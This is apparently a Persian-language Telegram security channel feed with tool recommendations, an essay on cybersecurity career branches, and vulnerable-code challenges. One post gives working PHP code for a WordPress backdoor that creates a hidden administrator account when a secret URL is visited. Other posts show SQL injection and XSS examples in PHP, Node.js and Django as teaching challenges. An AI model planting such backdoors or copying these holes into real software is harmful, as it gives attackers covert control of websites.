#تسلیت

جناب آقای مهندس حامد مقدسی پور ضمن تسلیت و در گذشت برادر عزیزتان و احساس همدردی با شما و خانواده شریفتان،از خداوند منان خواستاریم بهترین جایگاه بهشت را نصیبشان گرداند و به شما و عزیزانتان صبری جاودان بدهد.🖤🖤🖤


❇️با ما همراه باشید

🔰آکادمی روز صفر | 0Day Academy

🆔 @ZeroDayAcademyCom
🌐 0DayAcademy.com

سلام دوستان حتما کانال های زیر رو که امسال ایجاد شده اند دنبال کنید

@HamedMoqaddasi

@EleCompino

#Mobile #Android #IOS #Tools #Sec

📃یکی از مشکلاتی که خیلی از دوستانی که در حوزه اندروید پن تست دارند،وقت زیادی رو در مبحث Static Analysis یا بهتره بگم تست دستی نمیگذارند و میگن این مورد گاهی اوقات جون آدم رو در میاره و خسته کننده س و آدم زده میشه،فریمورک های خوبی در این زمینه مثل MobSF هست که به شما کمک می‌کنه تا سریعتر به اون اطلاعاتی که میخواهید برسید و بصورت خودکار اون کارها براتون انجام میده.

✳️این ابزار Static Analysis  روی برنامه های IOS را نیز انجام میدهد.

شما میتونید این ابزار رو از گیت هاب Git Clone کنید و در نهایت روی مرورگرتون اجرا کنید.

🔗لینک پروژه  گیت هاب MobSF:

https://github.com/MobSF/Mobile-Security-Framework-MobSF

✅ابزار دیگری که می‌خوام بهتون معرفی کنم یک سایت آنلاین هست که در واقع موتور جستجوی امنیت برنامه های موبایل هستش که به شما امکان Static Analysis برنامه ها رو میده

🔗سایت  https://bevigil.com

خوبی این سایت این است که شما براساس اسم برنامه های داخل Google Play میتوانید جستجو کنید و همچنین لینک برنامه مورد نظر رو در سرچ بار قرار بدید و حتی فایل مربوط به برنامه خودتون آپلود کنید تا آنالیز رو انجام بده،بهتره قبل از این کار برای خودتون پنل کاربری بسازید و وارد سایت بشید.

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

#Major #Field #Sec

📃شاخه ها و گرایش های امنیت سایبری

در حوزه امنیت سایبری شاخه ها و گرایش های مختلفی برای فعالیت وجود دارد زیرا این رشته آنقدر گسترده است که می توان با ظهور هر تکنولوژی جدیدی یک شاخه جدید به آن اضافه کرد...

✳️این مطلب رو من حدودا سال ۲۰۱۹ نوشتم و بعضی از سایت ها بدون اینکه از بنده  اسمی ببرند در سایتشون قرار دادند به هرحال هدف ارائه اطلاعات مفید می باشد و همچنین هر مطلب یا مقاله و کتاب ممکن است دارای یک سری نقص و ایرادات باشد.

1⃣تست نفوذ شبکه (Network Penetration Testing) :

افرادی که در این شاخه فعالیت می کنند دانش خوبی نسبت به حوزه زیرساخت و سرویس های شبکه دارند و از مهارت ها و ابزارهای تست نفوذ یا بهتر است بگوئیم از مهارت و ابزارهای هک برای پیدا کردن ضعف و آسیب پذیری های تجهیزات مختلف،سیستم های مختلف و سرویس های مختلف شبکه استفاده می کنند این افراد باید از جدیدترین ابزارها و روش های استفاده کنند تا بتوانند از مکانیزم های امنیتی شبکه نیز عبور کنند تا ضعف های مختلف شبکه را پیدا کنند.

2⃣امنیت شبکه (Network Security) :

افرادی که در این شاخه فعالیت می کنند دارای مهارت و تخصص در حوزه شبکه و سیستم های امنیتی مانند فایروال،سیستم های تشخیص نفوذ و جلوگیری از نفوذ هستند آن ها با طراحی و پیاده سازی و پیکربندی درست شبکه از اطلاعات و منابع شبکه محافظت می کنند تا از نفوذ و به خطر افتادن اطلاعات توسط هکرها جلوگیری کرد.

3⃣تست نفوذ وایرلس (Wireless Penetration Testing) :

افرادی که در این شاخه فعالیت می کنند دانش خوبی نسبت به حوزه وایرلس و همچنین انواع سیگنال های ارتباطی و امواج رادیویی دارند و از مهارت ها و ابزارهای تست نفوذ وایرلس و برخی از ابزارهای مربوط به مانتیورینگ شبکه برای پیدا کردن ضعف ها و آسیب پذیری های رایج در پروتکل های وایرلس و امنیتی استفاده می کنند.

4⃣تست نفوذ وب (Web Penetration Testing) :

افرادی که در این شاخه فعالیت می کنند دانش خوبی نسبت به برنامه نویسی وب و سرویس های وب دارند و از مهارت ها و ابزارهای تست نفوذ وب برای پیدا کردن آسیب پذیری ها سطح برنامه های کاربردی وب استفاده می کنند.

5⃣تست نفوذ موبایل (Mobile Penetration Testing) :

افرادی که در این شاخه فعالیت می کنند دانش خوبی نسبت به برنامه نویسی موبایل و همچنین معماری پلتفرم های موبایل دارند و از تحلیل های ایستا و پویا و ابزارهای موجود در این حوزه برای ارزیابی و کشف آسیب پذیری های برنامه های موبایل استفاده می کنند.

6⃣تست نفوذ اینترنت اشیا (IOT Penetration Testing) :

افرادی که در این شاخه فعالیت می کنند دانش خوبی نسبت به حوزه اینترنت اشیا و معماری آن دارند آن ها از مهارت ها و ابزارهای تست نفوذ اینترنت و شبکه و وایرلس برای پیدا کردن آسیب پذیری ها استفاده می کنند.

7⃣تست نفوذ سیستم های کنترل صنعتی (SCADA Penetration Testing) :

افرادی که در این شاخه فعالیت می کنند دانش خوبی نسبت به سیستم های کنترلی در صنعت برق،گاز،آب ،نفت،ریلی،هوایی و… دارند و از آن جایی که افراد باید در این شاخه دانش فراوانی در حوزه ارتباطات و کنترل سیستم های حیاتی و حساس داشته باشند و حداقل تجربه کار چند ساله در هر یک از صنایع مربوطه داشته باشد و با استفاده از مهارت های هکی در این حوزه و حوزه شبکه و… کسب کرده است می تواند آسیب پذیری و نقاط ضعف آن ها را پیدا کنند.

8⃣تست نفوذ کلود (Cloud Penetration Testing) :

افرادی که در این شاخه فعالیت می کنند دانش خوبی نسبت به فضاهای ابری و مجازی و برنامه نویسی و لینوکس دارند،آن ها از مهارت ها و ابزارهای هکی دارند برای پیدا کردن آسیب پذیری ها در این حوزه استفاده می کنند.

9⃣مهندسی معکوس (Reverse Engineering) :

افرادی که در این شاخه فعالیت می کنند مهارت کد نویسی بالایی دارند این مهارت شامل برنامه نویسی سطح پایین(ماشین و اسمبلی) و زبان های میانی (C,C++) و همچنین با معماری انواع پردازنده ها و سیستم عامل ها و همچنین با مباحث مهندسی نرم افزار آشنایی خوبی دارند،کار آن ها آنالیز و ارزیابی کدهاست و از این طریق متوجه می شوند که کدهای اجرا شده برای سیستم چه کارهای را انجام می دهد،آیا کدهای که اجرا می شود سیستم را به خطر می اندازد یا به اصطلاح کدهای مخربی در برنامه وجود دارد و…،همچنین این افراد توانایی توسعه کدهای مخرب را هم دارند و با تکنیک های مختلف آن ها را از دید برنامه های امنیتی و برنامه نویسان که دید امنیت قوی ندارند پنهان می کنند.

✳️ادامه دارد.....

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

#Major #Field #Sec

📃ادامه شاخه ها و گرایش های امنیت سایبری

🔟امنیت اطلاعات (Information Security) :

در این شاخه افرادی که می خواهند وارد شوند باید هم دانش فنی و دانش تئوری خوبی در زمینه های مختلف فناوری اطلاعات و مدیریتی داشته باشند زیرا این شاخه برای جلوگیری و حفاظت از اطلاعات و سیستم های اطلاعاتی در برابر خطرات و تهدیدات می باشد،خیلی از افراد فکر میکنند دانش تئوری فقط در این زمینه کافیست اما این باور غلطی است که خیلی از افراد دارند چرا که کسی که وارد این شاخه می شود باید توانایی درک و تحلیل قوی از سیستم ها داشته باشد با بررسی،ارزیابی و آزمایش سیستم های اطلاعاتی بتوانند بهترین نتیجه را برای محافظت و ایمن کردن آن ها در نظر بگیرید زیرا که با افزایش امنیت،پردازش و عملکرد سیستم ها دچار مشکل نشود.

1⃣1⃣جرم شناسی (Forensic) :

افرادی که در این شاخه فعالیت می کنند دانش نسبتا خوبی در زمینه تست نفوذ و هم چنین شبکه و رمزنگاری دارند،کار آن ها ردیابی مجرمان سایبری می‌باشد یا بهتر است بگوئیم هکرهای مخرب،آن ها از طریق ابزارهای که در این زمینه استفاده می کنند و همچنین از طریق بررسی پرونده ها و فایل ها و سیستم های مختلف و لاگ خوانی می توانند مجرمان را پیدا کنند و آن ها را تحویل قانون دهند.

2⃣1⃣مرکز عملیات امنیت (Security Operation Center) :

افرادی که در این شاخه فعالیت می کنند دانش نسبتا خوبی در زمینه های مختلف امنیت سایبری دارند،در واقع باید گفت این شاخه متشکل از یک تیم حرفه ای برای بررسی و پویش و مانتیورینگ و انجام ارزیابی و تست سیستم ها و همچنین شناسایی،شکار حوداث و تهدیدات و تجزیه و تحلیل آن ها و جلوگیری از حملات و تهدیدات است که بصورت شبانه روزی سیستم های یک سازمان را رصد و مانتیور می کنند،که دارای بخش های مختلفی می باشد هر بخش از تیم کارهای متفاوتی را انجام می دهند.

3⃣1⃣کد نویسی امن (Secure Coding) :

افرادی که در این شاخه فعالیت می کنند دارای مهارت برنامه نویسی قوی هستند که توانایی تحلیل و ارزیابی کدها دارند و کدهای آسیب پذیر را پیدا می کنند و به جای آن کدهای ایمن تری را می نویسند تا ضعف های کمتری یک برنامه داشته باشد(امنیت هیچ گاه صد در صد نیست)همچنین افراد از ابزارهای مختلفی در این زمینه استفاده می کنند تا سریعتر به نتیجه برسند،این حوزه خود به زیر شاخه های تبدیل می شود که به آن ها اشاره نمیکنیم زیرا شما با توجه به شاخه های که گفته شده است می توانید حدس بزنید چه زیرشاخه های دارد.

✳️ادامه دارد.....

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)
🆔 @HamedMoqaddasi

#پادکست
🎤 رادیو امنیت - Safe Cast - قسمت یازدهم

🔗 لینک CastBox
https://lian.ac/safe-cast-11

💠 چکیده اخبار این هفته:
✅ هک Cloudflare
✅ هک Anydesk و ارتباط آن با Cloudflare
✅ آسیب پذیری بحرانی Bootloader در Shim
✅بخش ویژه: Hack Case Study : TalkTalk

🔺 با اجرای: رضا الفت - 24 بهمن 1402

🔸 اطلاعات بیشتر:
☺️ 02191004151 | 😎 WhatsApp | 😎 Telegram

💻 گروه لیان
🔗 https://liangroup.net/
🕊 @AcademyLian

#Book #Security #Fuzzing

📃کتاب فازینگ نرم افزار برای ارزیابی امنیتی
{Fuzzing For Software Security Testing}

👌کتاب فوق به افرادی که در زمینه امنیت نرم افزار کار میکنند کمک می کند تا دانش  جامعی از عملیات فازینگ در دنیای امنیت را فرا بگیرند

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

👁‍🗨دِوین،اولین مهندس نرم‌افزار هوش مصنوعی

این هوش مصنوعی،یه برنامه‌نویس که خودش میتونه با ابزارهای مختلف کدنویسی،کد ادیتورها و مرورگرهای وب، مشکلات نرم‌افزاری رو حل کنه

آیا هوش مصنوعی بطور کل میتونه جایگزین کاملی برای مهندسین نرم افزار و توسعه دهندگان بشه🤔❗️

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

#AI #Tools #Site #Programming

👁‍🗨 این هوش مصنوعی مخصوص برنامه‌نویس ها و کسانی که میخواهند بهتر کدها را بفهمند و تحلیل کنند

✳️ با استفاده از این ابزار هوش مصنوعی می‌تونی هر کدی رو که دستت اومده مثه آب خوردن تحلیل کنی و حتی بهینه ش کنی.


🌀 اگه دنبال راهی واسه فهمیدن کدهای پیچیده هستید، این ابزار می‌تونه در این زمینه کمکتون کنه.

🌐 https://codetoflow.com

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

#Video #Short
حرف های خالق زبان CPP

بیش از اندازه روی یک حوزه متخصص نشوید...

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

#Programming #Code #Security #PHP #WordPress #Backdoor

چطور با زبان PHP  یک ادمین در وردپرس بسازیم ؟

کافیه کد زیر را در درون کدهای قالب سایت یا افزونه قرار بدبد

add_action( 'wp_head', 'add_user_in_wp' );

function add_user_in_wp() {
If ($_GET['@HamedMoqaddasi'] == '@Elecompino') {
require('wp-includes/registration.php');
If (!username_exists('@ZeroDayResearch')) {
$user_id = wp_create_user('@ZeroDayResearch', '@ZeroDayAcademyCom);
$user = new WP_User($user_id);
$user->set_role( 'administrator' );
}
}
}

وقتی کد مربوطه را قرار دادید اتفاق خاصی رقم نمی‌خوره اما به محض اینکه لینک زیر رو بزنید


https:/site.com/?@HamedMoqaddasi=@Elecompino

🌀جای عبارت site.com آدرس دامنه سایت وردپرس مربوطه را قرار بدید یک کاربر ادمین با نام کاربری @ZeroDayResearch و رمز عبور @ZeroDayAcademyCom براتون ساخته میشه و میتونید از طریق LoginPage وردپرس وارد پیشخوان وردپرس بشید.

👁‍🗨به این نوع کدها میگن بکدور که به اونا پرداخته خواهد شد

❌این پست صرفا جنبه آموزشی دارد و هرگونه سوءاستفاده از آن برعهده خود شخص می باشد،هرچند این روش خیلی راحت قابل شناسایی می باشد

✳️ادامه دارد.....

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔@HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

#Challenge #Programming  #Code #PHP

🔍آیا کد PHP زیر آسیب پذیری داره یا نه،اگر آسیب پذیری داره چه نوع آسیب پذیریه  و به چه دلیل؟!

<?php
$user_input = $_GET['username']; 


$sql = "SELECT * FROM users WHERE username = '$user_input'";
$result = $conn->query($sql);

if ($result->num_rows > 0) {
    echo "Login successfully!<br>";
} else {
    echo "Login failed.<br>";
}

?>

✳️سطح این چالش ساده می باشد

✅جواب خودتون رو در زیر همین پست کامنت کنید.

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

#Mobile #Android #Tools #Sec

🛡شاید بعنوان یک برنامه نویس یا کسی که در حیطه امنیت نرم افزار(مخصوصا امنیت نرم افزارهای اندروید)کار می‌کنه میخواهی بدونی یک اپلیکیشن چه آسیب پذیری های داره،میتونی از ابزار APKDeepLens استفاده کنی،این ابزار رو میتونه این کار رو برات انجام بده

🌐 https://github.com/d78ui98/APKDeepLens

👈خوبی این ابزار اینه که براساس Owasp Top 10 آسیب پذیری ها رو پوشش میده و کلی قابلیت دیگه بهت میده

❌دوستانی که بطور تخصصی در حیطه امنیت کار میکنند یا کار خواهند کرد،همیشه به ابزار اکتفا نکنید و بصورت دستی تست رو هم انجام بدید.

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

#Challenge #Programming  #Code #PY #JS

🔍نمونه کد ساده برای آسیب پذیری SQL Injection در  NodeJs و Django

کد زیر مربوط به NodeJs می باشد.👇

#NodeJS
const express = require('express');
const app = express();
const port = 3000;

app.get('/user', (req, res) => {
  const username = req.query.username; 

  const query = SELECT * FROM users WHERE username = '${username}';
  
  db.query(query, (err, results) => {
    if (err) throw err;
    res.json(results);
  });
});

app.listen(port, () => {
  console.log(Server running at http://localhost:${port});

کد زیر مربوط به Django می باشد.👇

#Django
from django.http import JsonResponse
from .models import User

def vulnerable_view(request):
    username = request.GET.get('username')  
  
    query = f"SELECT * FROM myapp_user WHERE username = '{username}'"
    users = User.objects.raw(query)

    result = [{'username': user.username, 'email': user.email} for user in users]
    return JsonResponse(result, safe=False)

👈کد PHP مربوط به آسیب پذیری SQLi اینجا ببنید👉

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

#AI #Tools #Python

👁‍🗨کنترل کامپیوتر با استفاده از زبان طبیعی

✳️با استفاده از ابزار یا هوش مصنوعی زیر که با پایتون توسعه داده شده میتونید در محیط Shell با کمک این ابزار کارهای متفاوتی از قبیل کدنویسی و تجزیه و تحلیل آن،
ساخت و ویرایش عکس ها و ویدیوها و فایل ها و... انجام دهید

✅با نصب داشتن پایتون در سیستم خود و اجرای دستور زیر در محیط CLI،بطور خودمونی همون Terminal یا CMD میتونید Open Interpreter را نصب کنید

pip install open-interpreter

با دستور زیر آن را اجرا کنید

interpreter

برای اطلاعات بیشتر میتونید به مخزن یا Repository  گیت هاب مراجعه کنید👇

🌐 https://github.com/OpenInterpreter/open-interpreter

و همچنین برای مطالعه داکیومنت آن از لینک زیر استفاده کنید👇
🌐 https://docs.openinterpreter.com/getting-started/setup


❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

#Challenge #Programming  #Code #VulnerableCode #PHP

👈ادامه چالش کدهای آسیب پذیر👉

🔍کد PHP چه نوع آسیب پذیری داره و به چه دلیل؟!

<!DOCTYPE html>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <noscript>Vulnerable Code Challenge</noscript>
</head>
<body>
    <h1>@HamedMoqaddasi</h1>
    <form action="" method="get">
        <input type="text" name="input" placeholder="Send Your Text" />
        <button type="submit">Send</button>
    </form>
    <div>
        <h2>Output:</h2>
        <p><?php echo $_GET['input']; ?></p>
    </div>
</body>
</html>

✳️سطح این چالش ساده می باشد

✅جواب خودتون رو در زیر همین پست کامنت کنید.

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

#Book #AI #RoadMap

📃نقشه راه یادگیری هوش مصنوعی (AI)

👌در این کتابچه به شما از مباحث پایه تا پیشرفته برای یادگیری حوزه هوش مصنوعی نقشه راه تعبیه شده که به شما کمک میکند مسیر خود را پیدا کنید

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

👁‍🗨هوش مصنوعی که به شما در نوشتن کدها کمک می کنه

🌐 https://www.tabnine.com

این سرویس از Deep Learning برای کمک به نوشتن کدهای سریع تر استفاده می کنه،همچنین توجه داشته باشید برای اولین بار میتونید با ایمیل خودتون تا 90 روز ازش بصورت رایگان استفاده کنید،کلا بهتره از  سرویس های ایمیل فیک مانند tempmail استفاده کنید.

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

#Web #Tools #Architecture
👁‍🗨مهم ترین معماری های دنیای وب

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X